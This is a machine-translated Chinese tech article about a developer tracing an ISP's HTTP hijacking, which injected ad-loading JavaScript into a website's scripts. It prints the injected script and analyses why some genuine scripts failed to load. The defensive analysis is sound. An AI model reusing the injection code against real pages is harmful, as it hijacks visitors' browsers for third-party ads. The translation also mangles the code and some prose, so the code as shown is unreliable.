Shulou(Shulou.com)06/03 Report--

This article will explain in detail how to find ISP hijacking HTTP requests. The editor thinks it is very practical, so I share it with you as a reference. I hope you can get something after reading this article.

Editor's note: by analyzing the alarm information we provide, Fundebug customers have located a very thorny problem-ISP hijacking http requests. His analysis process is very interesting, but also reminds us that we should support HTTPS in time to ensure the security of the site.

Recently, business systems often receive error emails from the front end.

It was found that a large number of ip were hijacked by Shenyang Unicom customers = = > initially inferred to be http hijacked by operators.

After on-the-spot inspection, it was found that there was an error in the loading of js in the part of the screen.

The difference is that the wrong js will insert an ad js first.

Check the NetWork panel to distinguish whether dns hijacked or not

IP is correct and confirms for our server IP that it is not DNS***.

Due to the emergence of Shenyang Unicom problem in a large area, (therefore, it should be considered as the operator problem? There should be no possibility that a large-scale router will be hacked.

The returned js is as follows

(function () {try {var o ='m murmury, D = document If (! D.getElementById (o)) {var j = 'http://yunxiu.f6car.com/kzf6/js/basic/XXX.js', J = j + (~ j.indexOf ('?)?'&':'?) + new Date () .getTime (), M = 'http://pc.quansj.cn/?cid=08', C = D.currentScript H = D.getElementsByTagName ('head') [0], N = function (s, I) {var I = D.createElement (' script') I.type = 'text/JavaScript'; if (I) I.id = I; I.src = s; H.appendChild (I);}; if (self = = top) {N (M, o) } if (! C) {C = (function () {var S = D.scripts, l = S.length, I = 0; for (; I < l) + + I) {if (S [I] .src = j) {return S [I];}) ();} C & & ((C.defer | | C.async)? N (J): D.write ('');}} catch (e) {}}) ()

Reverse search through domain name Whois

Found its domain name

There are several websites hijacked by advertisements.

It seems to have the same name as a talk show (Zhao Benshan apprentice). It's not the same person, is it?

After communicating with Shenyang Unicom, it was fruitless and refused to admit that there was hijacking. At present, we are turning to the Ministry of Industry and Information Technology. I wonder if there is a solution.

There is already an adblock for that address on github. Obviously Liaoning Unicom

After taking a look at the js option, it is normally executed to

Centering & ((C.defer | | C.async)? n (J): D.write (''))

The code determines that if defer or async is supported, js is loaded asynchronously by append, and if it is not supported, it is written directly through document (synchronous execution)

That is to say, in theory, the js~ on our server will be loaded synchronously, but in fact, a large number of js have not been loaded into the

After consulting, it is found that chrome has a setting (it is said to be optimized after the chrome55 (?) + version) can give it a try.

[chrome://flags/#disallow-doc-written-script-loads] ()

The details are as follows

With this data in mind, Chrome, starting with version 55, intervenes on behalf of all users when we detect this known-bad pattern by changing how [xss_clean] () is handled in Chrome (See Chrome Status). Specifically Chrome will not execute the elements injected via [xss_clean] () when all of the following conditions are met:

The user is on a slow connection, specifically when the user is on 2G. (In the future, the change might be extended to other users on slow connections, such as slow 3G or slow WiFi.)

The [xss_clean] () is in a top level document. The intervention does not apply to document.written scripts within iframes as they don't block the rendering of the main page.

The script in the [xss_clean] () is parser-blocking. Scripts with the 'async' or' defer' attributes will still execute.

The script is not hosted on the same site. In other words, Chrome will not intervene for scripts with a matching eTLD+1 (e.g. A script hosted on js.example.org inserted on www.example.org).

The script is not already in the browser HTTP cache. Scripts in the cache will not incur a network delay and will still execute.

The request for the page is not a reload. Chrome will not intervene if the user triggered a reload and will execute the page as normal.

Third party snippets sometimes use [xss_clean] () to load scripts. Fortunately, most third parties provide asynchronous loading alternatives, which allow third party scripts to load without blocking the display of the rest of the content on the page.

Looks like we don't meet the conditions. 4 consider it for the time being.

It was stunned after the code format. The premise of loading the js is that there are no nodes in the screen where the id is mmurmurm. Otherwise, js will not be loaded, that is, [xss_clean] will not be executed.

If the sad thing is that there are two or more js hijacked in our screen, then none of them will be loaded except the first js.

So take a look at the js request (with queryString) and find

Sure enough, the customer's request for commonjs, that is, commonjs, was hijacked at that time. At the moment, there is a node called "mmurmurm" in the screen. Causes other hijacked js not to load the real js.

Tell me more about the hijacking of our home page. )

Obviously it is also the hijacking of Jiangsu Broadband (Nanjing Telecom).

This is the end of the article on "how to find ISP hijacking HTTP requests". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.